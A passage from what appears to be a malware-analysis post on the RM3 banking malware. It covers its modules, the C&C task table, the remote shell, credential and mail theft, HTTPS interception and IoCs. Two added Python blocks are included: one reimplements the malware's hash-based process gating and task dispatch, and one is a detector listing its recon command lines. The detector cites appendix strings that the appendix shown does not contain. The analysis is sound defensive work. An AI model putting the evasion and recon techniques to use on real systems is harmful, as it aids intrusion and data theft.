DLL_PROCESS_DETACH (== 0): decrement the attach count and clean up\r\n        ModuleCleanup();\r\n    }\r\n    return Ret;\r\n}\r\nIt is only when we get to the ModuleStartup call that things start to become interesting. 
This code has been refactored and adjusted to the RM3 philosophy:\r\nstatic WINERROR ModuleStartup(HMODULE hModule, LPVOID lpReserved)\r\n{\r\n    WINERROR Status;\r\n    RM3_Struct *RM3;\r\n\r\n    // The mandatory RM3 structure that holds everything the module needs\r\n    // is obtained through an export of BL.DLL\r\n    RM3 = bl!GetRM3Struct();\r\n\r\n    // Decrypt the .bss section (CsDecryptSection is the name used in the ISFB leak)\r\n    Status = bl!CsDecryptSection(hModule, 0);\r\n\r\n    // Only run in the process this module was built for: the JamCRC32 of the\r\n    // current executable name, masked with a cookie constant, has to match the\r\n    // hash compiled into the module\r\n    if ( (gs_Cookie ^ RM3-\u003edCrc32ExeName) == PROCESSNAMEHASH )\r\n        Status = Startup();\r\n\r\n    return Status;\r\n}\r\nThis adjustment is pretty similar in all modules and can be summarised as three main steps:\r\n1. Requesting from bl.dll a critical global structure (called RM3_Struct for the purpose of this article) which holds the minimum needed for running the injected code smoothly. Its contents depend on the module: bl.dll mostly uses it for recreating values that seem to be part of the PEB (hypothesis), explorer.dll uses it for storing timeout values, and browser.dll uses it for the RM3 inject configuration.\r\n2. Decrypting the .bss section.\r\n3. Entering the checking routine through an ingenious mechanism: the filename of the child process is converted into a JamCRC32 hash and compared with the one stored in the startup function. If it matches, the module starts its worker routine, otherwise it quits.\r\nThese are just a few particular cases, but the philosophy of the RM3 module startup is well represented here. It is a simple and clever way of monitoring user interactions, because the malware controls everything spawned from explorer.exe.\r\nbl.dll – The backbone of RM3\r\nThe background loader is almost nothing and everything at the same time. 
It’s the root of the whole RM3 infrastructure once the initial loader has fully installed and configured it. Its main job is to initialise RM3_Struct and to provide a fundamental RM3 API to all other modules, exported by ordinal:\r\nOrdinal | Goal\r\n==========================================\r\n8576b0d0_1 | bl!GetBuild\r\n8576b0d0_2 | bl!GetRM3Struct\r\n8576b0d0_3 | bl!WaitForSingleObject\r\n8576b0d0_4 | bl!GenerateRNG\r\n8576b0d0_5 | bl!GenerateGUIDName\r\n8576b0d0_6 | bl!XorshiftStar\r\n8576b0d0_7 | bl!GenerateFieldName\r\n8576b0d0_8 | bl!GenerateCRC32Checksum\r\n8576b0d0_9 | bl!WaitForMultipleObjects\r\n8576b0d0_10 | bl!HeapAlloc\r\n8576b0d0_11 | bl!HeapFree\r\n8576b0d0_12 | bl!HeapReAlloc\r\n8576b0d0_13 | bl!???\r\n8576b0d0_14 | bl!Aplib\r\n8576b0d0_15 | bl!ReadSubKey\r\n8576b0d0_16 | bl!WriteSubKey\r\n8576b0d0_17 | bl!CreateProcessA\r\n8576b0d0_18 | bl!CreateProcessW\r\n8576b0d0_19 | bl!GetRM3MainSubkey\r\n8576b0d0_20 | bl!LoadModule\r\n8576b0d0_21 | bl!???\r\n8576b0d0_22 | bl!OpenProcess\r\n8576b0d0_23 | bl!InjectDLL\r\n8576b0d0_24 | bl!ReturnInstructionPointer\r\n8576b0d0_25 | bl!GetPRNGValue\r\n8576b0d0_26 | bl!CheckRSA\r\n8576b0d0_27 | bl!Serpent\r\n8576b0d0_28 | bl!SearchConfigFile\r\n8576b0d0_29 | bl!???\r\n8576b0d0_30 | bl!ResolveFunction01\r\n8576b0d0_31 | bl!GetFunctionByIndex\r\n8576b0d0_32 | bl!HookFunction\r\n8576b0d0_33 | bl!???\r\n8576b0d0_34 | bl!ResolveFunction02\r\n8576b0d0_35 | bl!???\r\n8576b0d0_36 | bl!GetExplorerPID\r\n8576b0d0_37 | bl!PsSupSetWow64Redirection\r\n8576b0d0_40 | bl!MainRWFile\r\n8576b0d0_42 | bl!PipeSendCommand\r\n8576b0d0_43 | bl!PipeMainRWFile\r\n8576b0d0_44 | bl!WriteFile\r\n8576b0d0_45 | bl!ReadFile\r\n8576b0d0_50 | bl!RebootBlModule\r\n8576b0d0_51 | bl!LdrFindEntryForAddress\r\n8576b0d0_52 | bl!???\r\n8576b0d0_55 | bl!SetEAXToZero\r\n8576b0d0_56 | bl!LdrRegisterDllNotification\r\n8576b0d0_57 | bl!LdrUnregisterDllNotification\r\n8576b0d0_59 | 
bl!FillGuidName\r\n8576b0d0_60 | bl!GenerateRandomSubkeyName\r\n8576b0d0_61 | bl!InjectDLLToSpecificPID\r\n8576b0d0_62 | bl!???\r\n8576b0d0_63 | bl!???\r\n8576b0d0_65 | bl!???\r\n8576b0d0_70 | bl!ReturnOne\r\n8576b0d0_71 | bl!AppAlloc\r\n8576b0d0_72 | bl!AppFree\r\n8576b0d0_73 | bl!MemAlloc\r\n8576b0d0_74 | bl!MemFree\r\n8576b0d0_75 | bl!CsDecryptSection (decrypts .bss; real name from the ISFB leak source code)\r\n8576b0d0_76 | bl!CreateThread\r\n8576b0d0_78 | bl!GrabDataFromRegistry\r\n8576b0d0_79 | bl!Purge\r\n8576b0d0_80 | bl!RSA\r\nexplorer.dll – the RM3 mastermind\r\nexplorer.dll could be regarded as the opposite of the background loader. It is designed to manage all interactions of this banking malware, at every level:\r\nChecking the timeout timers that can trigger drastic changes in RM3 operations\r\nAllowing and executing all tasks RM3 is able to perform\r\nStarting the fundamental grabbing features\r\nDownloading and updating modules and configs\r\nLaunching modules\r\nModifying RM3 URIs dynamically\r\nAn overview of the RM3 explorer.dll module\r\nThe task manager worker looks like the following:\r\nRM3 task manager implemented in explorer.dll\r\nInterestingly, the RM3 developers abuse their own hash system (JamCRC32) by scattering the hash comparisons across very large chains of conditions. This creates an ecosystem that looks unique to each build: every new build gives the impression that an RM3 module has received a major update, although technically it is just another anti-disassembly trick that greatly slows down in-depth analysis. 
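To make this hash-based dispatch concrete, here is an added example (it is not code from the original post, nor RM3’s own code) showing the three places the hash shows up: JamCRC32 itself, the masked process-name gate from the ModuleStartup listing above ((gs_Cookie ^ RM3->dCrc32ExeName) == PROCESSNAMEHASH), and a task table keyed by hash constants the way the explorer.dll task manager compares them. It also covers the reverse direction an analyst needs: labelling a hash constant found in a binary by hashing a wordlist. The cookie value, the handlers and the wordlist are constructed for the example; whether RM3 hashes exactly these byte strings (case, encoding) is not asserted here.

```python
"""JamCRC32 as used for gating module startup and dispatching tasks by hash.

Added example for this post: not RM3 code and not the Fox-IT authors' tooling.
The process-name gate mirrors the decompiled ModuleStartup check; the cookie
value, task handlers and candidate wordlist are constructed for the example.
"""
import zlib
from typing import Callable, Dict, Iterable, Optional

GS_COOKIE = 0x5A3C9E17  # constructed cookie constant, not a value taken from RM3


def jamcrc32(data: bytes) -> int:
    """JamCRC32 is the reflected CRC-32 (poly 0xEDB88320) *without* the final
    XOR with 0xFFFFFFFF. zlib.crc32 applies that XOR, so undo it."""
    return zlib.crc32(data) ^ 0xFFFFFFFF


def jamcrc32_reference(data: bytes) -> int:
    """Bit-serial reference implementation, to make the definition explicit."""
    crc = 0xFFFFFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ (0xEDB88320 if crc & 1 else 0)
    return crc  # no final inversion: that is the "Jam" in JamCRC


def gate_constant(target_exe: str, cookie: int = GS_COOKIE) -> int:
    """What a build embeds as PROCESSNAMEHASH: the hash of the process the
    module is meant for, masked with the cookie so the plain CRC never
    appears in the binary."""
    return jamcrc32(target_exe.lower().encode()) ^ cookie


def module_may_start(current_exe: str, embedded: int, cookie: int = GS_COOKIE) -> bool:
    """Mirror of the ModuleStartup check: run the worker only inside the
    process this module was built for, quit silently everywhere else."""
    crc_exe_name = jamcrc32(current_exe.lower().encode())
    return (cookie ^ crc_exe_name) == embedded


def build_dispatch_table(handlers: Dict[str, Callable[..., object]]) -> Dict[int, Callable[..., object]]:
    """Key the handlers by hash, which is all the binary carries: the task
    manager compares incoming hashes against constants, never strings."""
    return {jamcrc32(name.encode()): fn for name, fn in handlers.items()}


def dispatch(table: Dict[int, Callable[..., object]], task: str, *args: object) -> object:
    """Look the task up by its JamCRC32 and run it; unknown tasks are ignored."""
    handler = table.get(jamcrc32(task.encode()))
    return None if handler is None else handler(*args)


def resolve_hash(value: int, candidates: Iterable[str]) -> Optional[str]:
    """Analyst side: recover a name for a hash constant seen in a binary by
    hashing a wordlist (command names from other builds, leaked source, ...)."""
    for name in candidates:
        if jamcrc32(name.encode()) == value:
            return name
    return None


# Constructed handlers standing in for the explorer.dll task routines.
TASKS = build_dispatch_table({
    "RUN_CMD": lambda cmd: ("RUN_CMD", cmd),
    "CLR_LOGS": lambda: ("CLR_LOGS",),
    "GET_SYSINFO": lambda: ("GET_SYSINFO",),
})

if __name__ == "__main__":
    print(f"JamCRC32('123456789') = 0x{jamcrc32(b'123456789'):08x}")  # check value 0x340bc6d9
    embedded = gate_constant("explorer.exe")
    print("embedded constant:", hex(embedded))
    print("start in explorer.exe:", module_may_start("explorer.exe", embedded))
    print("start in chrome.exe:  ", module_may_start("chrome.exe", embedded))
    print(dispatch(TASKS, "RUN_CMD", "whoami /all"))
    print(resolve_hash(jamcrc32(b"CLR_LOGS"), ["RESTART", "CLR_LOGS", "REBOOT"]))
```

zlib.crc32 computes the standard CRC-32 with the final inversion; JamCRC32 is the same shift register without it, which is why the check value for "123456789" is 0x340bc6d9 rather than 0xcbf43926. Because the embedded constant is the hash XORed with a cookie, searching a binary for the plain CRC of "explorer.exe" finds nothing; hashing a wordlist and comparing against the constants (after undoing the mask where it is known) is the reliable way to label them.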
On the other hand, this task manager is a gold mine for understanding how all the interactions between bots and the C\u0026C are performed, and how to sort them into categories.\r\nGeneral commands\r\nCRC | Command | Description\r\n0xdf43cd90 | CRASH | Generate and send a crash report\r\n0x274323e2 | RESTART | Restart RM3\r\n0xce54bcf5 | REBOOT | Reboot the system\r\nRecording\r\nCRC | Command | Description\r\n0x746ce763 | VIDEO | Start desktop recording of the victim machine\r\n0x8de92b0d | SETVIDEO | VIDEO pivot condition\r\n0x54a7c26c | SET_VIDEO | Prepare desktop recording\r\nUpdates\r\nCRC | Command | Description\r\n0xb82d4140 | UPDATE_ALL | Force an update of all modules\r\n0x4f278846 | LOAD_UPDATE | Load and execute an updated PX module\r\nTasks\r\nCRC | Command | Description\r\n0xaaa425c4 | USETASKKEY | Use the task.bin public key for decrypting upcoming tasks\r\nTimeout settings\r\nCRC | Command | Description\r\n0x955879a6 | SENDTIMEOUT | Timeout timer for receiving commands\r\n0xd7a003c9 | CONFIGTIMEOUT | Timeout timer for receiving inject config updates\r\n0x7d30ee46 | INITIMEOUT | Timeout timer for receiving INI config updates\r\n0x11271c7f | IDLEPERIOD | Timeout timer for bot inactivity\r\n0x584e5925 | HOSTSHIFTTIMEOUT | Timeout timer for switching through the C\u0026C domain list\r\n0x9dd1ccaf | STANDBYTIMEOUT | Timeout timer for switching from the primary C\u0026Cs to the stand-by ones\r\n0x9957591 | RUNCHECKTIMEOUT | Timeout timer for checking and running the RM3 autorun\r\n0x31277bd5 | TASKTIMEOUT | Timeout timer for receiving a task request\r\nClearing\r\nCRC | Command | Description\r\n0xe3289ecb | CLEARCACHE | CLR_CACHE pivot condition\r\n0xb9781fc7 | CLR_CACHE | Clear all browser caches\r\n0xa23fff87 | CLR_LOGS | Clear all RM3 logs currently stored\r\n0x213e71be | DEL_CONFIG | Remove the requested RM3 inject config\r\nHTTP\r\nCRC | Command | Description\r\n0x754c3c76 | LOGHTTP | Intercept and log HTTP POST communication\r\n0x6c451cb6 | REMOVECSP | Remove CSP 
headers from HTTP\r\n0x97da04de | MAXPOSTLENGTH | Maximum length of POST data to log (description inferred from the command name)\r\nProcess execution\r\nCRC | Command | Description\r\n0x73d425ff | NEWPROCESS | Initialise the RM3 routine\r\nBackup\r\nCRC | Command | Description\r\n0x5e822676 | STANDBY | Case taken when the primary servers have not responded for X minutes\r\nData gathering\r\nCRC | Command | Description\r\n0x864b1e44 | GET_CREDS | Collect credentials\r\n0xdf794b64 | GET_FILES | Collect files (grabber module)\r\n0x2a77637a | GET_SYSINFO | Collect system information\r\nMain tasks\r\nCRC | Command | Description\r\n0x3889242 | LOAD_CONFIG | Download and load a requested config with specific arguments\r\n0xdf794b64 | GET_FILES | Download a DLL from a specific URL and load it into explorer.exe\r\n0xae30e778 | LOAD_EXE | Download an executable from a specific URL and run it\r\n0xb204e7e0 | LOAD_INI | Download and load an INI file from a specific URL\r\n0xea0f4d48 | LOAD_CMD | Load and execute the shell module\r\n0x6d1ef2c6 | LOAD_FTP | Load and execute the FTP module with specific arguments\r\n0x336845f8 | LOAD_KEYLOG | Load and execute the keylog module with specific arguments\r\n0xdb269b16 | LOAD_MODULE | Load and execute an RM3 PX module with specific arguments\r\n0x1e84cd23 | LOAD_SOCKS | Load and execute the SOCKS module with specific arguments\r\n0x45abeab3 | LOAD_VNC | Load and execute the VNC module with specific arguments\r\nShell command\r\nCRC | Command | Description\r\n0xb88d3fdf | RUN_CMD | Execute a specific command and send the output to the C\u0026C\r\nURI setup\r\nCRC | Command | Description\r\n0x9c3c1432 | SET_URI | Change the URI path of the requests\r\nFile storage\r\nCRC | Command | Description\r\n0xd8829500 | STORE_GRAB | Save grabber content into a temporary file\r\n0x250de123 | STORE_KEYLOG | Save keylog content into a temporary file\r\n0x863ecf42 | STORE_MAIL | Save stolen mail 
credentials into a temporary file\r\n0x9b587bc4 | STORE_HTTPLOG | Save intercepted HTTP data into a temporary file\r\n0x36e4e464 | STORE_ACC | Save stolen credentials into a temporary file\r\nTimeout system\r\nWith its timeout values stored in RM3_Struct, explorer.dll is able to manage and monitor every worker task it launches. Whenever one of the timers reaches its configured value, it changes the behaviour of the malware; in most cases this means avoiding unnecessary requests that would create noise and increase the chance of detection.\r\nCOM Objects being inspected for possible timeout\r\nBackup controllers\r\nIn the same way, explorer.dll also provides additional controllers, called ‘stand by’ domains. The idea is that, when the principal controller C\u0026Cs do not respond, a module can automatically switch to this preset list. The stand-by domains are stored in explorer.ini:\r\n{\r\n  \"STANDBY\": \"standbydns1.tld\",\"standbydns2.tld\",\r\n  \"STANDBYTIMEOUT\": \"60\" // Timeout in minutes\r\n}\r\nIn the example above, if the primary C\u0026C domains have not responded for one hour, requests automatically switch to the stand-by C\u0026Cs.\r\nDesktop recording and RM3 – an ingenious way to check bots\r\nRarely mentioned in the wild but actively used by TAs, RM3 is also able to record bot interactions. The video setup is stored in the client.ini file, which the bot receives from the controller domain.\r\n\"SETVIDEO\": [\r\n  \"30,\",    // recording length: 30 seconds\r\n  \"8,\",     // quality level (min: 1, max: 10)\r\n  \"notipda\" // process name list\r\n],\r\nOnly three values are required behind “SETVIDEO” to set up video recording:\r\nRM3 AVI recording setup\r\nAfter being initialised, the task waits its turn to be launched. 
It can be triggered in multiple ways:\r\nDetecting the use of specific keywords in a Windows process\r\nUsing RM3’s increased debugging telemetry to detect if something is crashing, either in the banking malware itself or in a deployed inject (although the ability to detect crashes in an inject is only hypothetical and has not been observed)\r\nRecording user interactions with a bank account; the ability to record video is a relatively new but killer move on the part of the malware developers, allowing them to check legitimate bots and work on their injects\r\nThe ability to record video depends solely on “@VIDEO=” being picked up by the browser module. It is not obvious at first glance when examining the config, and most likely lives inside the external inject parts.\r\n@ ISFB Code leak\r\nVideo tab - screen video recording\r\nOpcode = \"VIDEO\"\r\nUrl - sets the URL template of the page for which a screen recording has to be made\r\nTarget - (optional) sets a keyword; if it is present in the page code, a recording will be made\r\nVar - sets the recording length in seconds\r\nRM3 browser webinject module detecting if it needs to launch a recording session (or any other particular task).\r\nRM3 and its remote shell module – a trump card for ransomware gangs\r\nBanking malware having its own remote shell module drastically changes the potential impact of infecting a corporate network. This shell is entirely custom to the malware and purpose-built. 
It is also significantly less detectable than other tools currently seen at the start of lateral movement, simply because of its rarity. The combination of potentially much greater impact and lower detectability makes this piece of code a trump card, particularly as the TAs now look to migrate to a ransomware model.\r\nCalled cmdshell, this module isn’t exclusive to RM3 but has in fact been part of ISFB since at least build v2.15. It has likely been of interest to TA groups in fields less focused on fraud since then. The inclusion of a remote shell obviously greatly increases the flexibility this malware family provides to its operators, but also, of course, makes it harder to ascertain the exact purpose of any one infection, or the motivation of its operators.\r\nCmdshell module being launched by the RM3 Task Manager\r\nAfter being executed by the task command “LOAD_CMD”, the injected module installs a persistent remote shell which a TA can use to run any command they want.\r\nRM3 cmdshell module creating the remote shell\r\nAs noted above, the inclusion of a shell gives great flexibility, and it facilitates the work of at least two types of TA:\r\nFraudsters (if the VNC/SOCKS module isn’t working well, perhaps)\r\nMalicious red teams affiliated with ransomware gangs\r\nIt’s worth noting that this remote shell should not be confused with the RUN_CMD command. RUN_CMD instructs a bot to execute a single command, with the output saved and sent to the controllers. 
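To give defenders something concrete to hunt for, here is an added example of detection logic for this execution pattern; it is not code from the original post, nor RM3’s own. The decrypted explorer.dll strings in the appendix show how RUN_CMD and GET_SYSINFO output is produced: each command runs through cmd /C "%s" >> %S0, appending to one scratch file, and the results are consolidated and the scratch file removed with cmd /U /C "type %S0 > %S & del %S0". Read literally, %S0 is a %S conversion followed by the character '0', so the scratch file is the final file name with a '0' appended; the example treats that relation as an extra signal. The Sysmon-style process-creation records, file paths, PIDs, timestamps, the 60-second window and the threshold of three commands are constructed assumptions.

```python
"""Detection logic for the way RM3 executes RUN_CMD / GET_SYSINFO commands.

Added example, not part of the original post and not RM3 or Fox-IT code. The
two cmd.exe templates and the recon command list come from the decrypted
explorer.dll .bss strings in the appendix of the post; the sample events,
paths, PIDs, timestamps, window and threshold are constructed assumptions.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

# Recon commands RM3 runs for GET_SYSINFO (from the appendix strings), in the
# normalised form produced by normalise(): lower case, no .exe, single spaces.
RECON_COMMANDS = frozenset({
    "systeminfo",
    "driverquery",
    "net view",
    "nslookup 127.0.0.1",
    "whoami /all",
    "net localgroup administrators",
    'net group "domain computers" /domain',
    "tasklist /svc",
    r'reg query "hklm\software\microsoft\windows\currentversion\uninstall" /s',
})

# cmd /C "<command>" >> <scratch> : each command is run on its own, output appended to one file
RUN_TEMPLATE = re.compile(r'^cmd(?:\.exe)?\s+/c\s+"(?P<cmd>.+?)"\s+>>\s*(?P<out>\S+)\s*$', re.I)
# cmd /U /C "type <scratch> > <final> & del <scratch>" : consolidate, then delete the scratch file
COLLECT_TEMPLATE = re.compile(
    r'^cmd(?:\.exe)?\s+/u\s+/c\s+"type\s+(?P<src>\S+)\s*>\s*(?P<dst>\S+)\s*&\s*del\s+(?P=src)"\s*$', re.I)

WINDOW_SECONDS = 60.0   # assumed: the commands are issued back to back
MIN_DISTINCT = 3        # assumed: three different recon commands into one file is already unusual


def normalise(cmdline: str) -> str:
    """Lower-case, drop .exe suffixes and collapse whitespace so RECON_COMMANDS matches."""
    return " ".join(re.sub(r"\.exe\b", "", cmdline.lower()).split())


def detect(events: Iterable[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return findings keyed by the scratch file the commands were appended to."""
    findings: List[Dict[str, object]] = []
    hits: Dict[str, List[Tuple[float, str, object]]] = defaultdict(list)  # scratch -> (ts, cmd, ppid)

    for ev in sorted(events, key=lambda e: float(e["ts"])):
        cmdline = str(ev["cmdline"]).strip()
        m = RUN_TEMPLATE.match(cmdline)
        if m:
            command = normalise(m.group("cmd"))
            if command in RECON_COMMANDS:
                hits[m.group("out").lower()].append((float(ev["ts"]), command, ev["ppid"]))
            continue
        m = COLLECT_TEMPLATE.match(cmdline)
        if m:
            src, dst = m.group("src").lower(), m.group("dst").lower()
            findings.append({
                "rule": "collect_and_delete",
                "key": src,
                "ppid": ev["ppid"],
                # scratch == final + "0" is the %S0 / %S relation from the format strings
                "severity": "high" if src == dst + "0" else "medium",
            })

    # Several distinct recon commands appended to the same scratch file inside the window
    for scratch, seq in hits.items():
        seq.sort(key=lambda h: h[0])
        for i, (t0, _, ppid) in enumerate(seq):
            distinct = {c for t, c, _ in seq[i:] if t - t0 <= WINDOW_SECONDS}
            if len(distinct) >= MIN_DISTINCT:
                findings.append({"rule": "get_sysinfo_burst", "key": scratch, "ppid": ppid,
                                 "severity": "high", "commands": sorted(distinct)})
                break
    return findings


TEMP = r"C:\Users\jdoe\AppData\Local\Temp"  # constructed path
SAMPLE_EVENTS = [  # constructed Sysmon-style process-creation records
    # RM3 code running inside explorer.exe (PID 1337) spawning the GET_SYSINFO chain
    {"ts": 100.0, "ppid": 1337, "cmdline": rf'cmd /C "systeminfo.exe" >> {TEMP}\3A7F.bin0'},
    {"ts": 101.0, "ppid": 1337, "cmdline": rf'cmd /C "driverquery.exe" >> {TEMP}\3A7F.bin0'},
    {"ts": 102.0, "ppid": 1337, "cmdline": rf'cmd /C "net view" >> {TEMP}\3A7F.bin0'},
    {"ts": 103.0, "ppid": 1337, "cmdline": rf'cmd /C "whoami /all" >> {TEMP}\3A7F.bin0'},
    {"ts": 104.0, "ppid": 1337, "cmdline": rf'cmd /C "net group "domain computers" /domain" >> {TEMP}\3A7F.bin0'},
    {"ts": 105.0, "ppid": 1337,
     "cmdline": rf'cmd /U /C "type {TEMP}\3A7F.bin0 > {TEMP}\3A7F.bin & del {TEMP}\3A7F.bin0"'},
    # A user opening a console from Explorer and checking one thing: must not trigger
    {"ts": 900.0, "ppid": 2000, "cmdline": r'cmd /C "whoami /all" >> C:\Users\jdoe\Desktop\who.txt'},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Parentage alone is not a signal here: RM3 runs inside explorer.exe, but so does every program a user starts from the desktop, so the cmd.exe children of explorer.exe are normal. What is not normal is a series of different recon commands each redirected into the same scratch file within seconds, followed by a type-and-del consolidation of that file; keying the findings on the scratch file rather than on the parent process is what makes the rule survive RM3 spawning one cmd.exe per command.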
RUN_CMD also appears as a simple condition in the task manager:\r\nRUN_CMD inside the RM3 Task Manager\r\nIt is then followed by a standard I/O interaction:\r\nExecuting task in cmd console and saving results into an archive\r\nBoth RM3’s remote shell and RUN_CMD can serve as an entry point for pushing other specialised tools such as Cobalt Strike, Mimikatz or plain PowerShell scripts. With this kind of flexibility, the main limitation on the impact of this malware is any given TA’s level of skill and imagination.\r\nTask.key – a new weapon in RM3’s encryption paranoia\r\nSometime around Q2 2020, RM3 added an additional layer of protection to its network communications by updating the RSA public key used to encrypt communications between bot and controller domains.\r\nThe developers designed a pivot condition (USETASKKEY) that decides which of RSA.KEY and TASK.KEY is used to decrypt the content received from the C\u0026C, depending on the command/content received. We believe this choice was made to break researchers’ emulation of RM3 traffic.\r\nExtra condition with USETASKKEY to avoid using the wrong RSA pubkey\r\nRM3 – A banking malware designed to debug itself\r\nAs we’ve already noted, RM3 represents a significant step change from previous versions of ISFB. These changes extend from major architectural changes down to detailed functional changes, and so can be expected to have involved considerable development and probably testing effort as well. Whether or not the malware developers found troubleshooting the RM3 variant harder than before, they took the opportunity to include a troubleshooting feature. 
If RM3 experiences any issues, it is designed to dump the relevant process and send a report to the C\u0026C. It’s expected that this is then reported to the malware developers, which may explain why new builds now appear in the wild rather faster than before.\r\nThe task is initialised at the beginning of the explorer module startup with a simple routine:\r\nThe address of the MiniDumpWriteDump function from dbghelp.dll is stored\r\nThe path of the temporary dump file is stored (%temp%\\rm3.dmp, as seen in the decrypted explorer.dll strings in the appendix)\r\nAll these values are stored by a dedicated function into the RM3 master struct\r\nCrash dump being initialized and stored into the RM3 global structure\r\nWith everything configured, RM3 is ready for two possible scenarios:\r\nVoluntarily crashing itself with the command ‘CRASH’\r\nSomething goes wrong and a specific classic error code triggers the function\r\nRM3 executing the crash dump routine\r\nStolen Data – The (old) gold mine\r\nGathering interesting bots is a skill that most banking malware TAs have decent experience with after years of fraud. And nowadays, with the ransomware market exploding, this expertise probably also permits them to affiliate more easily with ransom crews (or even to obtain exclusivity in some cases).\r\nIn general, ISFB (v2 and v3) is a perfect playground, as it can be used as a loader with more advanced telemetry than classic info-stealers. Vidar, Taurus or Raccoon Stealer, for example, can’t compete at this level: they are designed to work as a one-shot process (and to be removed from the machine immediately afterwards), which makes them much less competitive than the more advanced and flexible ISFB. Of course, in any given situation, this does not necessarily mean they are less important than banking malware. 
And we should keep in mind that the REvil gang bought the source code of the KPOT stealer, likely so they could develop their own loader/stealer.\r\nIn terms of grabbing, RM3 can be split into three main parts:\r\nFiles/folders\r\nBrowser credential harvesting\r\nMail\r\nAn overview of standard stealing feature developed by RM3\r\nIt’s worth noting that the mail module is an underrated feature that can provide a huge amount of information to a TA:\r\nMany users store nearly everything in their email (including passwords and sensitive documents)\r\nMails can be stolen and resold to spammers for crafting legitimate-looking mails with malicious attachments/links\r\nStealing/intercepting HTTP and HTTPS communication\r\nRM3 implements an SSL proxy and so is really effective at intercepting POST requests performed by the user. All of them are stored and sent every X minutes to the controllers.\r\nRM3 browser module initializing the SSL proxy interception\r\nRM3 SSL Proxy running on MsEdge\r\nWhenever the user visits a website, part of the inject config automatically replaces strings or variables in the page code (‘base’) with new content (‘new_var’); this often includes a URL path pointing at an inject C\u0026C.\r\nAs if that wasn’t complicated enough, most injects are geofenced, and it is possible that the operators manually allow a bot to receive them (especially the elite ones). 
Indeed, this is another trick for preventing analysts and researchers from obtaining and reporting those scripts, which cost financial companies millions.\r\nA typical inject entry in config.bin\r\nA parser then replaces the variables ‘@ID@’ and ‘@GROUP@’ with the correct values as stored in RM3_Struct and other structures relevant to the browser.dll module.\r\nBrowser inject module parsing config.bin and replacing with respective botid and groupid\r\nSystem information gathering\r\nGathering system information is simple with RM3:\r\nManually (using a specific RUN_CMD command)\r\nRequesting info from a bot with GET_SYSINFO\r\nIndeed, GET_SYSINFO is known and regularly used by ISFB actors (both active strains). It runs the following commands:\r\nsysteminfo.exe\r\ndriverquery.exe\r\nnet view\r\nnslookup 127.0.0.1\r\nwhoami /all\r\nnet localgroup administrators\r\nnet group \"domain computers\" /domain\r\nTAs in general spend a lot of time (or literally pay people) inspecting bots for the stolen data they have gathered. In this regard, bots can be split into one of the following groups:\r\nHome bots (personal accounts)\r\nResearcher bots\r\nCorporate bots (compromised host from a company)\r\nOver the past 6 months, ISFB v2 has been extremely active in terms of updates. One purpose of these updates has been to help TAs filter their bots directly on the loader side, and more easily. This filtering is not new at all, but it is probably of more interest (and could have a greater impact) for malicious operations these days.\r\nMicrosoft Edge (Chromium) joining the targeted browser list\r\nOne critical aspect of any banking malware is the ability to hook into a browser so as to inject fakes and replacers into financial institution websites.\r\nAt the same time as the Task.key implementation, RM3 added a new browser to its targeted list: “MsEdge”. 
This was not random, but a development choice driven by the sheer number of corporate computers migrating from Internet Explorer to Edge.\r\nRM3 MsEdge startup module\r\nThis means that 5 browsers are currently targeted:\r\nInternet Explorer\r\nMicrosoft Edge (Original)\r\nMicrosoft Edge (Chromium)\r\nMozilla Firefox\r\nGoogle Chrome\r\nCurrently, RM3 doesn’t seem to interact with Opera. Given Opera’s low user share and almost non-existent corporate presence, developing a new module for Opera would not be expected to have an ROI attractive enough to the TAs and RM3 developers: any development and debugging would be time-consuming and could delay useful updates to existing modules that already produce a reliable return.\r\nRM3 and its homemade forked SQLITE module\r\nA lot of this blog post has been dedicated to the innovative design and features of RM3. But perhaps the best example of the attention to detail in its design and development is the custom SQLite3 module that ships with RM3. 
Presumably driven by the need to extract credential data from browsers (and related tasks), the developers forked the original SQLite3 source code and refactored it to work inside RM3. Using SQLite is not new, of course; it was already noted in the ISFB leak.\r\nInterestingly, the RM3 build is based on the original 3.8.6 release and has all the features and functions of the original version.\r\nBecause the background loader (bl.dll) is the only module within RM3 technically capable of performing allocation operations, the library’s “free”, “malloc” and “realloc” calls have simply been wired to this backbone module.\r\nWhat’s new with Build 300960?\r\nGoodbye Serpent, Hello AES!\r\nAround mid-March, RM3 pushed a major update replacing Serpent encryption with good old AES-128-CBC. All locations where Serpent was used have been reworked to use AES.\r\nAES 128 CBC implementation in RM3\r\nRM3 C\u0026C response also reviewed\r\nBefore build 300960, RM3 treated data received from controllers as described below. The information is split into two encrypted parts (a header and a body), which are handled differently:\r\n1. The encrypted header was decrypted with the public RSA key extracted from the modules, yielding a Serpent key.\r\n2. This Serpent key was then used to decrypt the encrypted body (this is a different key from the one used for client.ini and loader.ini).\r\nThis was the setup before build 300960:\r\nNow, in the recently released 300960 build, with Serpent removed and AES implemented instead, the structure of the encrypted header has changed as indicated below:\r\nThe decrypted body data produced by this process is not in an entirely standard format. 
In fact, it is compressed with the aPLib library. Removing the first 0x14 bytes (or sometimes 0x4 bytes) and decompressing the remainder yields the final block, ready for analysis:\r\nIf it is a DLL, it is in the PX format\r\nIf it is web injects, it is an archive containing .sig files (that is, MAIN.SIG†)\r\nIf it is tasks or config updates, they are in the classic raw ISFB config format\r\n† SIG can probably be taken to mean ‘signature’\r\nChanges in .ini files\r\nTwo fields have been added in the latest campaigns. Interestingly, these are not new RM3 features but old ones that have been present for quite some time.\r\n{\r\n  \"SENDFGKEY\": \"0\", // Send Foreground Key\r\n  \"SUBDOMAINS\": \"0\"\r\n}\r\nAppendix\r\nIoCs – Campaign\r\n00cd7319a42bbabd0c81a7e9817d2d5071738d5ac36b98b8ff9d7383c3d7e1ba - DE\r\na7007821b1acbf36ca18cb2ec7d36f388953fe8985589f170be5117548a55c57 - Italy\r\n5ee51dfd1eb41cb6ce8451424540c817dbd804f103229f3ae1b645b320cbb4e8 - Australia/NZ 1\r\nc7552fe5ed044011aa09aebd5769b2b9f3df0faa8adaab42ef3bfff35f5190aa - Australia/NZ 2\r\n261c6f7b7e9d8fc808a4a9db587294202872b2a816b2b98516551949165486c8 - UK 1\r\n2e0b219c5ac3285a08e126f11c07ea3ac60bc96d16d37c2dc24dd8f68c492a74 - UK 2\r\n6818b6b32cb91754fd625e9416e1bc83caac1927148daaa3edaed51a9d04e864 - Worldwide 